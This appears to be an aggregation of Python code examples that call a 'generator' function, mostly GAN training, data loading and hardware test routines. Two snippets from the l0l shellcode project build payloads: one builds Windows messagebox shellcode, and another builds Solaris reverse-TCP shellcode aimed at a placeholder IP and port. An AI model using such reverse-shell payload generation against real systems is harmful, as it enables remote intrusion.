Example #1
0
def evolutionary_arms_race(raw_images):

    # Rescale to the discriminator's range of [-1, 1]
    real_images = raw_images * 2. - 1.

    noise = np.random.normal(-1., 1., size=[batch_size, noise_dim]).astype(np.float32)

    #discriminator gradient update
    with tf.GradientTape() as g:
            
        fake_images = generator(noise, is_training=True)
        disc_fake = discriminator(fake_images, is_training=True)
        disc_real = discriminator(real_images, is_training=True)

        loss_discriminator = discriminator_loss(disc_fake, disc_real)
            
    gradients_disc = g.gradient(loss_discriminator,  discriminator.trainable_variables)
    optimizer_discriminator.apply_gradients(zip(gradients_disc,  discriminator.trainable_variables))

    # noise = np.random.normal(-1., 1., size=[batch_size, noise_dim]).astype(np.float32)
    
    #generator gradient update
    with tf.GradientTape() as g:
            
        fake_images = generator(noise, is_training=True)
        disc_fake = discriminator(fake_images, is_training=True)

        loss_generator = generator_loss(disc_fake)
            
    gradients_gen = g.gradient(loss_generator, generator.trainable_variables)
    optimizer_generator.apply_gradients(zip(gradients_gen, generator.trainable_variables))
    
    return loss_generator, loss_discriminator
Example #2
0
    def _step(self, images: tf.Tensor, batch_size: int):
        noise = tf.random.normal([batch_size, self.noise_dim])
        generator = self.generator.model
        discriminator = self.discriminator.model

        with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
            generated_images = generator(noise, training=True)

            real_output = discriminator(images, training=True)
            fake_output = discriminator(generated_images, training=True)

            gen_loss = self.generator.loss(fake_output)
            disc_loss = self.discriminator.loss(real_output, fake_output)
            tf.keras.backend.print_tensor(gen_loss, "GEN")
            tf.keras.backend.print_tensor(disc_loss, "DISC")

        gradients_of_generator = gen_tape.gradient(
            gen_loss, generator.trainable_variables)
        gradients_of_discriminator = disc_tape.gradient(
            disc_loss, discriminator.trainable_variables)

        self.generator.optimizer.apply_gradients(
            zip(gradients_of_generator, generator.trainable_variables))
        self.discriminator.optimizer.apply_gradients(
            zip(gradients_of_discriminator, discriminator.trainable_variables))
Example #3
0
 def test_generatorB(self):
     genB = generator(5, 8921, 48271)
     self.assertEqual(list(genB), [430625591, \
                             1233683848, \
                             1431495498, \
                             137874439, \
                             285222916])
Example #4
0
 def test_generatorA(self):
     genA = generator(5, 65, 16807)
     self.assertEqual(list(genA), [1092455, \
                             1181022009, \
                             245556042, \
                             1744312007, \
                             1352636452])
Example #5
0
def calibration(obj):
    start = time.time()
    output = generator("Calibration", 0, obj.register)
    for i in output[0]:
        print i
    file_name = "./routines/Calibration/FPGA_instruction_list.txt"
    output = obj.interfaceFW.launch(obj.register, file_name, obj.COM_port)

    cal_values = []

    if output[0] == "Error":
        text = "%s: %s\n" % (output[0], output[1])
        obj.add_to_interactive_screen(text)
    else:
        flag = 0
        print len(output[0])
        for i in output[0]:
            if i.type_ID == 0:
                if flag == 0:
                    base_value = int(''.join(map(str, i.data)), 2)
                    print "Base value: %d" % base_value
                    flag = 1
                else:
                    step_value = int(''.join(map(str, i.data)), 2)
                    print "Step value: %d" % step_value
                    cal_value = step_value - base_value
                    print "Cal value: %d" % cal_value
                    cal_values.append(cal_value)

    print cal_values
Example #6
0
def train(image_path, mask_path):
    print('load data>>>>')
    image_train, image_valid, mask_train, mask_valid = preprocess_data_train(
        image_path, mask_path, size=64, replica=3, split=True)

    print('data loading complete!')

    print('model loaded>>>>')
    print('fitting model>>>>')
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    with tf.Session(graph=tf.get_default_graph(), config=config) as sess:
        K.set_session(sess)
        sess.run(tf.global_variables_initializer())
        os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
        stop = EarlyStopping(patience=4)

        # checkpoint = ModelCheckpoint(filepath='/checkpoint-{epoch:02d}-{val_loss:.4f}.hdf5',
        #                             monitor='val_loss', verbose=1, save_best_only=True)

        model = unet(lr=1e-4)
        model.summary()
        model.fit_generator(
            generator=generator(image_train, mask_train),
            steps_per_epoch=len(image_train),
            epochs=10,
            validation_data=[image_valid, mask_valid],
            #validation_steps=64,
            verbose=1,
            callbacks=[stop])
        model.save_weights('./weight.h5')
Example #7
0
def view(generator, state):
    # Generate a random image
    image = generator(state[0,:,:,:])
    cv2.imwrite("test.png", 255 * np.clip(tf.squeeze(image).numpy(), 0, 1))
    cv2.imshow('Generated', tf.squeeze(image).numpy())
    cv2.waitKey(0)
    cv2.destroyAllWindows()
Example #8
0
def train_batch(generator, discriminator, batch_real, epoch, i):

    ###############################################
    ############# Train discriminator #############
    ###############################################
    with tf.GradientTape() as tape:
        # Generate fake data and concatenate to real, and generate corresponding
        # labels.
        latent_state = tf.random.normal([batch_real.shape[0], generator.latent_dimension])
        batch_fake = generator(latent_state)
        batch = tf.concat([batch_real, batch_fake], axis=0)
        labels = tf.concat([tf.fill((batch_real.shape[0], 1), k_real), 
            tf.fill((batch_real.shape[0], 1), k_fake)] , axis=0)

        # Make a prediction and compute the loss.
        prediction = discriminator(batch)
        loss = discriminator.loss(prediction, labels)
        if (epoch % 2 == 0 and i % 10 == 0):
            print("DISCRIMINATOR LOSS, epoch " + str(epoch) + " batch " + str(i) + ": " + str(loss))
        
    # Apply the gradients.
    gradients = tape.gradient(loss, discriminator.trainable_variables)
    discriminator.optimizer.apply_gradients(zip(gradients, discriminator.trainable_variables))

    # ###############################################
    # ############### Train generator ###############
    # ###############################################
    # train the generator for more iterations than the discriminator
    k_generator_iterations = 1
    for k in range(k_generator_iterations):
        with tf.GradientTape() as tape:
            # Generate only fake data.
            latent_state = tf.random.normal([batch_real.shape[0] * 2, generator.latent_dimension])
            batch = generator(latent_state)
            labels = tf.fill((batch.shape[0], 1), k_fake)

            # Make a prediction and compute the loss.
            prediction = discriminator(batch)
            loss = -discriminator.loss(prediction, labels)
        if (k == 0 and epoch % 2 == 0 and i % 10 == 0):
            print("GENERATOR LOSS, epoch " + str(epoch) + " batch " + str(i) + ": " + str(loss))
        
        # Apply the gradients.
        gradients = tape.gradient(loss, generator.trainable_variables)
        generator.optimizer.apply_gradients(zip(gradients, generator.trainable_variables))
Example #9
0
def generate_fake_images(generator, batch_size, noise_v_size, device,
                         images_save_path):
    noise = torch.randn(batch_size, noise_v_size, 1, 1, device=device)
    fake_images = generator(noise).detach().cpu()
    count = 0
    for i in fake_images:
        img_path = f"{images_save_path}/{count}.png"
        vutils.save_image(i, img_path)
        count += 1
Example #10
0
 def handle_nested(self, name, generator):
     if name != "ids":
         self.client.logger.debug(
             "%s building nested property '%s'", self, name)
     try:
         return generator(self.client, self._data[name], self)
     except GeneratorExit:
         del self._data[name]
         self.client.logger.error("GeneratorExit during %s", name)
     return getattr(self, name)
Example #11
0
def train():
    # Init Keras Model here
    model = homography_net(num_classes=FLAGS.num_classes,
                           dropout_keep_prob=FLAGS.dropout_keep_prob)
    model.compile(optimizer=SGD(lr=FLAGS.init_learning_rate, momentum=0.9),
                  loss=SMSE,
                  metrics=[mean_corner_err])

    model_json = model.to_json()
    with open("homography_net_" + FLAGS.warp_func + "_model.json",
              "w") as json_file:
        json_file.write(model_json)  # Save model architecture
    time_str = datetime.datetime.now().isoformat()
    print("{}: Model saved as json.".format(time_str))

    # Trainer
    learning_rate = LearningRateScheduler(halve_lr)
    checkpointer = ModelCheckpoint(filepath="./checkpoints/" +
                                   FLAGS.warp_func + "_epoch_{epoch:02d}.h5",
                                   period=1,
                                   verbose=1,
                                   save_best_only=True,
                                   mode='min',
                                   monitor='loss')
    tensorboard = TensorBoard(log_dir='./logs',
                              batch_size=FLAGS.batch_size,
                              write_images=True)
    model.fit_generator(
        generator('./dataset/train_' + FLAGS.warp_func, FLAGS.batch_size),
        steps_per_epoch=int(
            np.floor((64 * FLAGS.samples_per_archive) / FLAGS.batch_size)),
        epochs=FLAGS.num_epochs,
        verbose=1,
        validation_data=generator('./dataset/val_' + FLAGS.warp_func,
                                  FLAGS.batch_size),
        validation_steps=int(np.floor(FLAGS.num_val_samples /
                                      FLAGS.batch_size)),
        callbacks=[checkpointer, tensorboard, learning_rate])
    # Save the final trained model here
    model.save_weights(
        'checkpoints/homography_model_weights.h5')  # Save model weights
    time_str = datetime.datetime.now().isoformat()
    print("{}: Training complete, model saved.".format(time_str))
Example #12
0
 def build_generator(self, name, args=None):
     """Builds a processor instance."""
     args = args or {}
     generator = self.generators.get(name)
     if not generator:
         raise ValueError('Generator "{}" does not exist'.format(name))
     try:
         return generator(**args)
     except Exception as e:
         raise ValueError('Generator "{}" could not be created: {}'.format(
             name, str(e)))
Example #13
0
 def refinder(self, reftype, refname):
     """this method is required by translator, require self.ref_map"""
     when_error = "[%s:%s]" % (reftype, refname)
     reftype = self.reftype_trans(reftype)
     if reftype is None:  # illeagal reftype
         return when_error
     libname = self.ref_map[reftype]
     inlib = self.sub_dict(libname)
     obj = generator(inlib[refname], reftype)
     if obj is None:
         return when_error
     return obj.view_body
Example #14
0
 def refinder(self, reftype, refname):
     '''this method is required by translator, require self.ref_map'''
     when_error = '[%s:%s]' % (reftype, refname)
     reftype = self.reftype_trans(reftype)
     if reftype is None:  #illeagal reftype
         return when_error
     libname = self.ref_map[reftype]
     inlib = self.sub_dict(libname)
     obj = generator(inlib[refname], reftype)
     if obj is None:
         return when_error
     return obj.view_body
Example #15
0
def train_step(images, masks):

    # --- Images processing ----
    def process_image(img, masks):
        # Randomly transform image
        img = tf.image.random_flip_left_right(img)
        img = tf.image.random_flip_up_down(img)
        rand_nb = random.randint(0, 3)
        for i in range(rand_nb):
            img = tf.image.rot90(img)

        # Generate and apply mask
        img_masked = img * masks

        # Generate random noise
        noise = tf.random.normal([BATCH_SIZE, 256, 256, 1])

        return img, (img_masked, masks, noise)

    # Process all images and put them in 2 tables
    full, masked = process_image(images, masks)
    # print(" >> images processing done << : ", images)

    # ---- Gradient descent ----
    with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
        generated_images = generator(masked, training=True)

        real_output = discriminator(full, training=True)
        fake_output = discriminator(generated_images, training=True)

        gen_loss = generator_loss(fake_output, masked[0], generated_images,
                                  masked[1])
        disc_loss, real_loss, fake_loss = discriminator_loss(
            real_output, fake_output)

    gradients_of_generator = gen_tape.gradient(gen_loss,
                                               generator.trainable_variables)
    gradients_of_discriminator = disc_tape.gradient(
        disc_loss, discriminator.trainable_variables)

    generator_optimizer.apply_gradients(
        zip(gradients_of_generator, generator.trainable_variables))
    discriminator_optimizer.apply_gradients(
        zip(gradients_of_discriminator, discriminator.trainable_variables))

    generator_metric(gen_loss)
    discriminator_metric(disc_loss)

    return masked, fake_output, real_output, real_loss, fake_loss
Example #16
0
def generate_rimed_aggregate(*args, **kwargs):
    """Generate a rimed aggregate particle.
    
    Args:
        monomer_generator: The Generator object used to make the ice 
            crystals.
        N: Number of ice crystals to aggregate.
        align: If True, the aggregate is kept horizontally aligned between
            iterations.
        riming_lwp: Liquid water path that the aggregate is assumed to fall
            through [kg/m^2].
        riming_eff: Riming efficiency (between 0 and 1, default 1); this 
            multiplies the riming_lwp parameter.
        riming_mode: "simultaneous" if the aggregation and riming occur
            simultaneously, or "subsequent" if all aggregation is done first,
            followed by the riming.
        pen_depth: The distance that rime particles are allowed to penetrate
            into the particle.
        seed: Random seed. If not None, this seed is used to initialize the
            random generator.
        lwp_div: See the documentation for generate_rime for details.
        debug: If True, print additional debugging information.
        iter: If True, this function will return an iterator that gives the
            different stages of the aggregation and riming.

    Returns:
        If iter=True, a generator giving the different stages of aggregate
        formation and riming; each iteration returns a list of the particles
        at that stage. If iter=False, returns the final aggregate particle as
        an Aggregate instance (this is equivalent to the final iteration when
        iter=True).
    """

    if "iter" in kwargs:
        iter = kwargs["iter"]
        del kwargs["iter"]
    else:
        iter = False

    if iter:
        def generator():
            for aggs in generate_rimed_aggregate_iter(*args, **kwargs):
                yield aggs
        return generator()
    else:
        aggs = None
        for aggs in generate_rimed_aggregate_iter(*args, **kwargs):
            pass
        return aggs[0]
Example #17
0
def get_gan_network(generator, discriminator, optimizer):
    # discriminator.trainable = False
    # set_trainable(discriminator, False)

    gan_input = Input(shape=(LRDim, LRDim, 3))

    generated_images = generator(gan_input)

    gan_output = discriminator(generated_images)

    gan = Model(inputs=gan_input, outputs=[generated_images, gan_output])

    gan.compile(loss=['mse', 'binary_crossentropy'],
                optimizer=optimizer,
                metrics=[psnr.PSNR, 'accuracy'])
    return gan
 def post(self):
     handler_para = ObjDoLikePara(self)
     handler_json = ObjDoLikeJson(self)
     usr = self.current_user
     article_obj = generator(handler_para['obj_id'],
                             handler_para['obj_type'])
     if article_obj is None:
         handler_json.by_status(2)
         handler_json.write()
         return  #obj not exist
     if not usr.reverse_like_post(article_obj):
         handler_json.by_status(1)
         handler_json.write()
         return  #not an article type
     handler_json.by_status(0)
     handler_json.write()
     return  #0
Example #19
0
def generate_images_from_zero_noise(generator,
                                    noise_v_size,
                                    device,
                                    images_save_path,
                                    n_samples=100,
                                    n_rows=8,
                                    padding=2,
                                    norm=True,
                                    alpha=0.1):
    noise = torch.randn(1, noise_v_size, 1, 1, device=device).zero_()
    count = 0
    for i in range(n_samples):
        fake_image = generator(noise).detach().cpu()
        noise += alpha
        img_path = f"{images_save_path}/{count}.png"
        vutils.save_image(fake_image, img_path)
        count += 1
 def post(self):
     handler_para = ObjDoLikePara(self)
     handler_json = ObjDoLikeJson(self)
     usr = self.current_user
     article_obj = generator(handler_para['obj_id'], 
                             handler_para['obj_type'])
     if article_obj is None:
         handler_json.by_status(2)
         handler_json.write()
         return #obj not exist
     if not usr.reverse_like_post(article_obj):
         handler_json.by_status(1)
         handler_json.write()
         return #not an article type
     handler_json.by_status(0)
     handler_json.write()
     return #0
Example #21
0
def train(dataloader, discriminator, generator, optimizer_d, optimizer_g, criterion, device):
    
    print('Starting the training loop ...')
    for epoch in range(num_epochs):
        generator_losses = []
        discriminator_losses = []
        for i, data in enumerate(dataloader, 1):
            
            # train the discriminator with real data
            discriminator.zero_grad()
            b_size = data[0].size(0)
           
            
            label = torch.full((b_size,), real_label, device=device)
            error_d_real, output_d_real = train_discriminator(data[0], label, discriminator, criterion, device)
            
            # train the discriminator with fake data
            noise = noise_data(b_size, n_latent_vector).to(device)
            fake = generator(noise)
            label.fill_(fake_label)
            error_d_fake, output_d_fake = train_discriminator(fake.detach(), label, discriminator, criterion, device)
            
            # total error
            error_discriminator = error_d_fake + error_d_real
            
            # Update the discriminator's parameters
            optimizer_d.step()
            
            # train the generator
            generator.zero_grad()
            label.fill_(real_label)
            error_generator, output_g_fake = train_generator(discriminator, fake, label, criterion)
            optimizer_g.step()
            generator_losses.append(error_generator.item())
            discriminator_losses.append(error_discriminator.item())
            
        print(f'{epoch:<10} {"generator loss:"} {sum(generator_losses)/len(generator_losses)}\
        {"discriminator loss:"} {sum(discriminator_losses)/len(discriminator_losses)}')
        
        checkpoint(epoch, generator_network, discriminator_network)
Example #22
0
    def __init__(self,
                 name="trainnetwork",
                 numTracks=10,
                 trackLength=2500,
                 numTrains=10,
                 a=(5, 30),
                 iat=(20, 50),
                 vmax=150):
        CoupledDEVS.__init__(self, "system")
        self.lights = numTracks

        self.generator = self.addSubModel(
            generator(num_trains=numTrains, IAT=iat, a_max=a))
        self.railways = []
        for x in range(numTracks):
            self.railways.append(
                self.addSubModel(
                    railwaysegment("Rail" + str(x), trackLength, vmax)))

        self.collector = self.addSubModel(collector())

        self.connectPorts(self.generator.QUERY, self.railways[0].QUERYRECV)
        self.connectPorts(self.generator.TRAIN, self.railways[0].TRAIN)
        self.connectPorts(self.railways[0].QUERYACK, self.generator.QUERYRECV)

        for x in range(1, self.lights):
            self.connectPorts(self.railways[x - 1].TRAINOUT,
                              self.railways[x].TRAIN)
            self.connectPorts(self.railways[x - 1].QUERYSEND,
                              self.railways[x].QUERYRECV)
            self.connectPorts(self.railways[x].QUERYACK,
                              self.railways[x - 1].QUERYACKRECV)

        self.connectPorts(self.railways[-1].TRAINOUT, self.collector.TRAIN)
        self.connectPorts(self.railways[-1].QUERYSEND,
                          self.collector.QUERYRECV)
        self.connectPorts(self.collector.QUERYACK,
                          self.railways[-1].QUERYACKRECV)
Example #23
0
 def post_comment(self, commentobj):
     commentid = commentobj.uid
     father = generator(commentobj.father_id, commentobj.father_type)
     father.lib.comment_list.push(commentobj._id)
     commentobj.do_post()
     del self.lib.drafts_lib[commentid]
Example #24
0
        l.trainable = flag


gan_opt = Adam(lr=0.00009, beta_1=0.5, beta_2=0.999, epsilon=1e-08)
d_opt = Adam(lr=0.00009, beta_1=0.5, beta_2=0.999, epsilon=1e-08)

if model_checkpoint == 'y':
    print("Loading the saved models: ")
    generator = load_model(model_path + "\\generator.hd5")
    discriminator = load_model(model_path + "\\discriminator.hd5")
    set_trainable(discriminator, True)
    discriminator.compile(loss='binary_crossentropy', optimizer=d_opt)
    gan = load_model(model_path + "\\gan.hd5",
                     custom_objects={'PSNR': psnr.PSNR})
else:
    generator = generator(LRDim, num_residual_blocks)
    discriminator = discriminator(HRDim, d_opt)
    generator = generator.get_generator()
    discriminator = discriminator.get_discriminator()
    gan = get_gan_network(generator, discriminator, gan_opt)

discriminator.compile(loss='binary_crossentropy', optimizer=d_opt)
gan.compile(loss=['mse', 'binary_crossentropy'],
            optimizer=gan_opt,
            metrics=[psnr.PSNR, 'accuracy'])

epochs = 50
batch_size = 8

batch_count = len(LRimages) // batch_size
        data_loader = torch.utils.data.DataLoader(database, batch_size=arc.batch_size, shuffle=True)
        num_batches = len(data_loader)

        print(dataAtts.fname)
        print(arc.name)
        for epoch in range(epochs):
            if (epoch % 100 == 0):
                print("Epoch ", epoch)

            for n_batch, real_batch in enumerate(data_loader):
                # 1. Train DdataAtts.fnameiscriminator
                real_data = Variable(real_batch).float()
                if torch.cuda.is_available(): 
                    real_data = real_data.cuda()
                # Generate fake data
                fake_data = generator(random_noise(real_data.size(0))).detach()
                # Train D
                d_error, d_pred_real, d_pred_fake = train_discriminator(d_optimizer, discriminator, loss, real_data, fake_data)

                # 2. Train Generator
                # Generate fake data
                fake_data = generator(random_noise(real_batch.size(0)))
                # Train G
                g_error = train_generator(g_optimizer, discriminator, loss, fake_data)

                # Display Progress

                #if (n_batch) % print_interval == 0:

        # From this line on it's just the saving
        # save_model("generator", epoch, generatorAtts, generator.state_dict(), g_optimizer.state_dict(), loss, dataAtts.fname, arc.name)
Example #26
0
 def getter(self):
     return generator(self.data['owner_id'], self.data['owner_type'])
Example #27
0
    try:
        float(s)
        return True
    except ValueError:
        return False


print("Input begin, end, step and EPS")
begin, end, step, EPS = input().split()

for x in begin, end, step, EPS:
    if (RepresentsFloat(x) == False):
        raise ValueError("Input values must be float")

begin = float(begin)
end = float(end)
step = float(step)
EPS = float(EPS)

iterList = LinkedList()
for x in Iterator(begin, end, step, EPS):
    iterList.push_back(x)

iterList.print()

genList = LinkedList()
for x in generator(begin, end, step, EPS):
    genList.push_back(x)
print()
genList.print()
Example #28
0
#------------------------------------------------------------------#
#Author  : roissy
#Greetz  : b3mb4m, esw0rmer
#Concat  : [email protected]
#Project : https://github.com/roissy/l0l
#LICENSE : https://github.com/roissy/l0l/blob/master/LICENSE
#------------------------------------------------------------------#

from generator import *

shellcode = generator( "windows", "messagebox", "dfgdfghdsfgdfgsdfdfgfdgfgddgfgdsfagseg666")



b = shellcode.split("\\")

x = 1

p = (len(b)/20)+1
loplop = 1
for i in range((len(b)/20)+1):
    j = b[x:x+20]
    line = ""
    for k in range(len(j)):
        line += "\\"+j[k]
    #print '"'+line+'"+'
    if p != loplop:
        print '"'+line+'"+'
    else:
        print '"'+line+'";'
    x += 20
Example #29
0
#------------------------------------------------------------------#
#Author  : roissy
#Greetz  : b3mb4m, esw0rmer
#Concat  : [email protected]
#Project : https://github.com/roissy/l0l
#LICENSE : https://github.com/roissy/l0l/blob/master/LICENSE
#------------------------------------------------------------------#

from generator import *

i = "255.255.255.255"
p = "44442"

shellcode = generator("solarisx86", "reverse_tcp", i, p)

print shellcode
Example #30
0
def concecutive_triggers(obj, nr_loops=25):
    timestamp = time.strftime("%Y%m%d_%H%M")
    scan_name = "Consecutive_Triggers"
    file_name = "./routines/%s/FPGA_instruction_list.txt" % scan_name
    output_file = "%s/concecutive_tiggers/%s_concecutive_triggers.dat" % (
        obj.data_folder, timestamp)
    if not os.path.exists(os.path.dirname(output_file)):
        try:
            os.makedirs(os.path.dirname(output_file))
        except OSError as exc:  # Guard against race condition
            print "Unable to create directory"
    open(output_file, 'w').close()

    instruction_text = []
    instruction_text.append("1 Send RunMode")
    instruction_text.append("10 Send EC0")
    instruction_text.append("10 Send BC0")
    instruction_text.append("100 Send_Repeat LV1A 4000 100")
    instruction_text.append("1000 Send ReSync")

    # Write the instructions to the file.
    output_file_name = "./routines/%s/instruction_list.txt" % scan_name
    with open(output_file_name, "w") as mfile:
        for item in instruction_text:
            mfile.write("%s\n" % item)
    # Generate the instruction list for the FPGA.
    generator("Consecutive Triggers", obj.write_BCd_as_fillers, obj.register)

    obj.register[65535].RUN[0] = 1
    obj.write_register(65535)
    time.sleep(1)

    obj.register[130].ECb[0] = 1
    obj.register[130].BCb[0] = 1
    obj.write_register(130)
    time.sleep(1)

    trigger_counter = 0
    data_packet_counter = 0
    hit_counter = 0
    crc_error_counter = 0
    ec_error_counter = 0
    bc_error_counter = 0
    start = time.time()

    for k in range(0, nr_loops):
        trigger_counter += 4000
        previous_EC = 0
        previous_BC = 0
        output = obj.interfaceFW.launch(obj.register,
                                        file_name,
                                        obj.COM_port,
                                        1,
                                        save_data=1,
                                        obj=obj)
        if output[0] == "Error":
            text = "%s: %s\n" % (output[0], output[1])
            obj.add_to_interactive_screen(text)
        else:

            for i in output[3]:
                if i.type == "data_packet":
                    data_packet_counter += 1
                    if i.hit_found == 1:
                        hit_counter += 1
                    if i.crc_error == 1:
                        crc_error_counter += 1
                    ec_diff = i.EC - previous_EC
                    if ec_diff != 1:
                        print "->EC error"
                        print "Previous EC: %d" % previous_BC
                        print "Current EC: %d" % i.BC
                        ec_error_counter += 1
                    previous_EC = i.EC
                    bc_diff = i.BC - previous_BC
                    if bc_diff != 100:
                        print "->BC error"
                        print "Previous BC: %d" % previous_BC
                        print "Current BC: %d" % i.BC
                        bc_error_counter += 1
                    previous_BC = i.BC

        stop = time.time()
        run_time = (stop - start) / 60
        result = []
        result.append("-> %d Triggers sent." % trigger_counter)
        result.append("%d Data packets received." % data_packet_counter)
        result.append("CRC errors: %d" % crc_error_counter)
        result.append("EC errors: %d" % ec_error_counter)
        result.append("BC errors: %d" % bc_error_counter)
        result.append("Hits found: %d" % hit_counter)
        result.append("Time elapsed: %f min" % run_time)
        result.append("***************")

        with open(output_file, "a") as myfile:
            for line in result:
                print line
                myfile.write("%s\n" % line)

    obj.register[65535].RUN[0] = 0
    obj.write_register(65535)
    time.sleep(1)

    obj.register[130].ECb[0] = 0
    obj.register[130].BCb[0] = 0
    obj.write_register(130)
    time.sleep(1)
Example #31
0
def train_epoch(models,
                optimizer,
                loader,
                batch_size,
                device,
                scale_factor=0.25):
    lambda_1 = 0.5
    lambda_2 = 1
    lambda_3 = 10
    lambda_4 = 1

    warper = Warper(device)
    segmentator = models['seg'].train()
    generator = models['gen'].train()
    discriminator = models['dis'].train()

    dis_criterion = torch.nn.CrossEntropyLoss()
    ssim_criterion = pytorch_ssim.SSIM3D(window_size=11)
    classes_weights = [1 / 33, 1 / 33, 1 / 33, 10 / 33, 10 / 33, 10 / 33]
    dice_criterion = Dice_Loss()
    smooth_criterion = Gradient_Loss()
    focal_criterion = Focal_Loss(0.7, 0.3, 4 / 3, weights=classes_weights)

    optimizer_gs = optimizer['gs']
    optimizer_d = optimizer['d']

    run_dis_loss = 0
    run_adv_loss = 0
    run_inv_loss = 0
    run_smooth = 0
    run_div_loss = 0
    run_segmentation_loss = 0
    run_dice_gt = np.zeros(6)
    run_dice_pd = np.zeros(6)

    start_time = time()

    for step, (x, y, x_1, x_2, y_1, y_2, s, k_1, k_2, inter_subject,
               intra_subject) in enumerate(loader):
        #print(step)
        #Load training example to device
        x, y, k_1, k_2 = x.to(device), y.to(device), k_1.to(device), k_2.to(
            device)
        y_1, y_2 = y_1.to(device), y_2.to(device)
        s, inter_subject, intra_subject = s.to(device), inter_subject.to(
            device), intra_subject.to(device)

        #train discriminator
        optimizer_d.zero_grad()

        pred = discriminator(y_1, y_2)
        dis_loss = dis_criterion(pred, s)

        dis_loss.backward()
        optimizer_d.step()

        run_dis_loss += dis_loss.item()

        #train generator and segmentation
        optimizer_gs.zero_grad()
        #generate deformed image
        _f_1_f, _f_1_b = generator(x, k_1)
        f_1_f, f_1_b = scale_factor * _f_1_f, scale_factor * _f_1_b
        z_1 = warper(x, f_1_f)
        y_1 = warper(y, f_1_f)

        _f_2_f, _f_2_b = generator(x, k_2)
        f_2_f, f_2_b = scale_factor * _f_2_f, scale_factor * _f_2_b
        z_2 = warper(x, f_2_f)
        y_2 = warper(y, f_2_f)

        # Reconstruct image
        x_r_1 = warper(z_1, f_1_b)
        x_r_2 = warper(z_2, f_2_b)

        y_r_1 = warper(y_1, f_1_b)
        y_r_2 = warper(y_2, f_2_b)

        # Segmentation
        hat_y_d_1 = segmentator(z_1)
        hat_y_d_2 = segmentator(z_2)
        hat_y_1 = warper(hat_y_d_1, f_1_b)
        hat_y_2 = warper(hat_y_d_2, f_2_b)

        # Discriminator
        pred = discriminator(hat_y_1, y)

        # compute loss
        # Invetibility Loss
        res_1 = -ssim_criterion(x_r_1, x)
        res_2 = -ssim_criterion(x_r_2, x)
        reconstruction_ssim_loss = 1 / 2 * (res_1 + res_2)
        dice_1 = dice_criterion(y_r_1, y)
        dice_2 = dice_criterion(y_r_2, y)
        reconstruction_dice_loss = 1 / 2 * (dice_1 + dice_2)
        inv_loss = 1 / 2 * (reconstruction_ssim_loss +
                            reconstruction_dice_loss)

        # Diversity Loss
        distortion_loss = ssim_criterion(z_1, z_2)
        distortion_dice_loss = -dice_criterion(y_1, y_2)
        div_loss = 1 / 2 * (distortion_loss + distortion_dice_loss)

        # Smooth
        smooth_1 = smooth_criterion(_f_1_f)
        smooth_2 = smooth_criterion(_f_2_f)
        smooth_3 = smooth_criterion(_f_1_b)
        smooth_4 = smooth_criterion(_f_2_b)
        smooth = 0.25 * (smooth_1 + smooth_2 + smooth_3 + smooth_4)

        # Segmentation Loss
        seg_loss_1 = focal_criterion(hat_y_1, y)
        seg_loss_2 = focal_criterion(hat_y_2, y)
        segmentation_loss = 1 / 2 * (seg_loss_1 + seg_loss_2)

        # Adversarial Loss
        adv_loss = dis_criterion(pred, inter_subject)

        total_loss =  segmentation_loss + lambda_1 * adv_loss\
           + lambda_2 * inv_loss + lambda_3 * smooth + lambda_4 * div_loss

        total_loss.backward()
        optimizer_gs.step()

        # compute reconstructed ground truth dice score
        dice_score_gt_1 = compute_dice_score(y_r_1, y, device)
        dice_score_gt_2 = compute_dice_score(y_r_2, y, device)
        dice_score_gt = 0.5 * (dice_score_gt_1 + dice_score_gt_2)
        run_dice_gt += dice_score_gt
        # compute reconstructed predicted segmap dice score
        dice_score_pd_1 = compute_dice_score(hat_y_1, y, device)
        dice_score_pd_2 = compute_dice_score(hat_y_2, y, device)
        dice_score_pd = 0.5 * (dice_score_pd_1 + dice_score_pd_2)
        run_dice_pd += dice_score_pd

        # Accumulate loss values
        run_adv_loss += adv_loss.item()
        run_inv_loss += inv_loss.item()
        run_smooth_loss += smooth.item()
        run_div_loss += div_loss.item()
        run_segmentation_loss += segmentation_loss.item()

    dur = time() - start_time

    #Logging values
    models = {'gen': generator, 'seg': segmentator, 'dis': discriminator}
    optimizer = {'gs': optimizer_gs, 'd': optimizer_d}

    avg_dis_loss = run_dis_loss / (step + 1)
    avg_inv_loss = run_inv_loss / (step + 1)
    avg_div_loss = run_div_loss / (step + 1)
    avg_smooth_loss = run_smooth / (step + 1)
    avg_adv_loss = run_adv_loss / (step + 1)
    avg_segmentation_loss = run_segmentation_loss / (step + 1)
    avg_dice_gt = run_dice_gt / (step + 1)
    avg_dice_pd = run_dice_pd / (step + 1)

    #Print log
    print('invertibility_loss:      {:.4f} -- diversity_loss:     {:.4f}'\
      .format(avg_inv_loss, avg_div_loss))
    print('reconstruction_dice_score:{:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_gt[0],avg_dice_gt[1],avg_dice_gt[2],avg_dice_gt[3],avg_dice_gt[4],avg_dice_gt[5]))
    print('segmentation_loss:        {:.4f}'\
      .format(avg_segmentation_loss))
    print('Segmentation_dice_score:  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}  {:.4f}'\
     .format(avg_dice_pd[0],avg_dice_pd[1],avg_dice_pd[2],avg_dice_pd[3],avg_dice_pd[4],avg_dice_pd[5]))
    print('smooth:                   {:.4f}'.format(avg_smooth))
    print('discriminator:                   {:.4f}'.format(avg_dis_loss))
    print('adversarial  :                   {:.4f}'.format(avg_adv_loss))
    print('duration:{:.0f}'.format(dur))

    return models, optimizer
Example #32
0
def val_epoch(models, loader, batch_size, device, scale_factor=0.25):
    warper = Warper(device)
    segmentator = models['seg'].train()
    generator = models['gen'].train()
    discriminator = models['dis'].train()

    dis_criterion = torch.nn.CrossEntropyLoss()
    ssim_criterion = pytorch_ssim.SSIM3D(window_size=11)
    classes_weights = [1 / 33, 1 / 33, 1 / 33, 10 / 33, 10 / 33, 10 / 33]
    dice_criterion = Dice_Loss()
    smooth_criterion = Gradient_Loss()
    focal_criterion = Focal_Loss(0.7, 0.3, 4 / 3, weights=classes_weights)

    run_dis_loss = 0
    run_adv_loss = 0
    run_inv_loss = 0
    run_smooth = 0
    run_div_loss = 0
    run_segmentation_loss = 0
    run_dice_gt = np.zeros(6)
    run_dice_pd = np.zeros(6)

    start_time = time()
    with torch.no_grad():
